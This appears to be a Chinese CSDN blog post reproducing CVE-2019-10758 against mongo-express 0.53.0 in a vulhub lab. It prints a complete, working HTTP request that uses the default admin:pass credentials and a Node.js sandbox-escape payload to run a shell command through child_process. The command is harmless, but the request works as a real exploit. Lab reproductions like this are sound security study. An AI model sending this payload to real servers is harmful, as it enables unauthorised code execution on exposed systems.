vulhub漏洞复现40_Mongo-express

最新推荐文章于 2022-02-10 22:27:03 发布
最新推荐文章于 2022-02-10 22:27:03 发布
阅读量417 收藏
点赞数
文章标签: mongodb 服务器 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122838093
版权
本文详细介绍了CVE-2019-10758,这是一个针对mongo-express的严重漏洞,允许攻击者在未修改默认凭证的情况下执行任意node.js代码。通过启动一个0.53.0版本的mongo-express靶场并发送特定数据包,可以复现漏洞,导致`touch/tmp/success`命令被执行。该漏洞提醒用户务必更改默认凭据以增强安全性。
摘要由CSDN通过智能技术生成

CVE-2019-10758_mongo-express 远程代码执行漏洞

漏洞详情

mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(`admin:pass`),则可以执行任意node.js代码。

漏洞环境

靶场:192.168.4.10_ubuntu

执行如下命令启动一个0.53.0版本的mongo-express:

```bash

docker-compose up -d

```

环境启动后,访问`http://your-ip:8081`即可查看到Web页面。

漏洞复现

直接发送如下数据包,即可执行代码`this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")`:

```

POST /checkValid HTTP/1.1

Host: your-ip

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Authorization: Basic YWRtaW46cGFzcw==

Content-Type: application/x-www-form-urlencoded

Content-Length: 124

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

```

"touch /tmp/success"成功执行

 

 

 

Revenge_scan
关注
mongo-express 远程代码执行漏洞复现
Tauil的博客
07-30 1142
方法没有进行检验,导致在知晓用户密码情况下可以执行js代码。js文件中定义了该页面访问路径在。同时数据包需要新增类型。打开靶场vulhub。登录网页,发送数据包。
mongo-express 远程代码执行漏洞(CVE-2019-10758)
玄道的网安博客
06-20 1643
前言 mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 影响版本 mongo-express, 0.54.0 之前的版本 环境搭建 cd vulhub/mongo-express/CVE-2019-10758 docker-compose up -d 环境启动后,访问http://your-ip:8081即可查看到Web页面
mongo-express远程代码执行(CVE-2019-10758)漏洞复现(msfvenom/wget,反弹shell)
negnegil的博客
09-07 4091
mongo-express mongo-express是一个MongoDB的Admin Web管理界面,基于NodeJS、Express、Bootstrap3开源编写 漏洞介绍 在开启了端口8081后,攻击者可以直接访问,而目标服务器上没有修改默认的登录密码admin/pass,则攻击者可以远程执行node.js代码 复现环境 mongo-express 0.53.0 MongoDB Version 3.4.24 漏洞环境搭建 采用github开源docker漏洞环境搭建而成 项目地址: https:/
Node.js 常见漏洞学习与总结
weixin_50464560的博客
10-01 3684
转载https://threezh1.com/2020/01/30/NodeJsVulns/ 危险函数所导致的命令执行eval()eval() 函数可计算某个字符串,并执行其中的的 JavaScript 代码。和PHP中eval函数一样,如果传递到函数中的参数可控并且没有经过严格的过滤时,就会导致漏洞的出现。 简单例子: main.js 1234567891011var express = require("express");var app = express();app.get('/eval',fu
php_mongo-1.3.1( PHP 5.2, 5.3 and 5.4) builds for Windows VC9 (32bit and 64bit)
03-24
标题 "php_mongo-1.3.1( PHP 5.2, 5.3 and 5.4) builds for Windows VC9 (32bit and 64bit)" 描述了一个针对PHP 5.2、5.3和5.4版本的MongoDB扩展的Windows构建,适用于Visual C++ 9编译器(32位和64位)。...
mongo-express-mongodb-k8s:Kubernetes配置文件,用于部署与mongodb容器通信的mongo-express容器
03-25
MongoDB是目前非常流行的一款开源、高性能、无模式的文档型数据库,而Mongo-Express则是一个基于WebMongoDB管理界面,它使得管理和操作MongoDB数据库变得更加直观和方便。在Kubernetes(K8s)这样的容器编排系统中...
php_mongo-1.6.0-5.3-ts-vc9-x86
01-30
标题 "php_mongo-1.6.0-5.3-ts-vc9-x86" 指的是一个特定版本的 PHP MongoDB 扩展,这个扩展是为 PHP 5.3 版本设计的,特别适用于线程安全(TS)且使用 Visual C++ 9 编译器编译的 32 位(x86)系统。在 PHP 开发中,...
PyPI 官网下载 | flask_rest_mongo-0.1.2-py3-none-any.whl
02-08
标题中的“PyPI 官网下载 | flask_rest_mongo-0.1.2-py3-none-any.whl”指的是在Python的包索引服务(Python Package Index)网站上下载的一个名为`flask_rest_mongo`的软件包。该包的版本是0.1.2,适用于Python 3...
彻底弄懂Spring中Bean的解析、创建和使用
前往JAVA架构的路上
06-28 2576
Spring加载Bean、实例化Bean、获取Bean流程 本文旨在通过分析源码的方式,来剖析Spring加载Bean、实例化Bean、获取Bean的流程,部分核心内容会在源码中说明。内容比较枯燥,慎入! 第一步,启动一个Spring项目 Spring启动入口 从官方文档中我们可以获取到下面这种Spring的启动方式。 我们传入一个text.xml文件 ApplicationContext context = new ClassPathXmlApplicationContext("classpa
mongo-express 代码执行 (cve-2019-10758)
qq_51459600的博客
12-24 832
1.环境搭建 项目地址: vulhub/mongo-express/CVE-2019-10758 at master · vulhub/vulhub (github.com) 拉取项目: git clone https://github.com.cnpmjs.org/vulhub/vulhub.git [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m0qN0Cum-1640341732202)(https://cdn.jsdelivr.net/gh/QJLONG/HUMME
mongo-express 远程代码执行漏洞分析
蚁景网安学院
06-30 754
搭建调试环境,调试 CVE-2019-10758 漏洞,学习nodejs 沙箱绕过,以及nodejs 远程调试。目前网上关于该漏洞的基于docker的远程调试分析写的很泛,本文从初学者角...
cve-2019-10758 mongo-express rce 漏洞分析
whatday的专栏
06-14 1483
下面是对漏洞的描述: mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses thetoBSONmethod. A misuse of thevmdependency to performexeccommands in a non-safe environment. 环境搭建 漏洞复现需要准备的环境有: MongoDB node & npm mon...
2020-CSR-CTF-Web-复盘以及分析
蚁景网安学院
12-02 929
2020 年 10 月 31 日万圣节举办的德国比赛,界面很有特色,web 题目质量很高,队伍只出了三道,结束后通通复盘了一遍深入理解。题目从易到难一共有十道,其中九道有出,本篇只详细分析解数多的五道,其余四道比赛时只有个位数 solve ,打算后续专门写四篇结合相应漏洞讲述。
基于RestTemplate的在线武器库
kali_Ma的博客
02-10 7720
1.前言 最近在接触到分布式方面知识的时候,学习了RestTemplate的一些使用。RestTemplate比较常见的就是用来进行一些http请求。本人在使用之后,在语法简洁的同时,感觉非常的方便。 于是乎在后面就想到了,通过RestTemplate来做成在线的"武器库",会不会更方便呢。因为Springboot开发本来就比较简单,而且在后期进行一些团队协作的时候,用在线的平台是不是相对于团队更方便?避免了因为环境不一致而造成的问题。 2.RestTemplate get请求及传参 2.1正常get请求不
Nodejs惊爆重大漏洞
keketebiluodi的博客
06-15 5985
作者:CNVD近日,国家信息安全漏洞共享平台(CNVD)收录了Node.js反序列化远程代码执行漏洞(CNVD-2017-01206,对应 CVE-2017-594)。攻利用漏洞执行远程执行操作系统指令,获得服务器权限。由于目前验证代码已经公开,极有可能诱发大规模网站攻击。一、漏洞情况分析Nodejs是一个Javascript运行环境(runtime),对Google V8引擎进行了封装。Node...
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
黑白的博客
12-22 1293
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
Node.js 目录穿越漏洞(CVE-2017-14849)——漏洞复现
W小哥
12-15 2137
一、漏洞原理 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如…/…/…/…/…/…/etc/passwd),在中间位置增加foo/…/(如…/…/…/foo/…/…/…/…/etc/passwd),即可使normalize返回/etc/passwd,但实际上正确结果应该是…/…/…/…/…/…/etc/passwd。 express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于normalize函数。比如,express在判断path
Python库解压工具:rasa_mongo_tracker_store-0.1.1
资源摘要信息:"Python库 | rasa_mongo_tracker_store-0.1.1-py3-none-any.whl" 知识点一:Python语言和库的概念 Python是一种广泛使用的高级编程语言,它以易于学习和阅读的代码风格而闻名。Python库是一系列预先...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值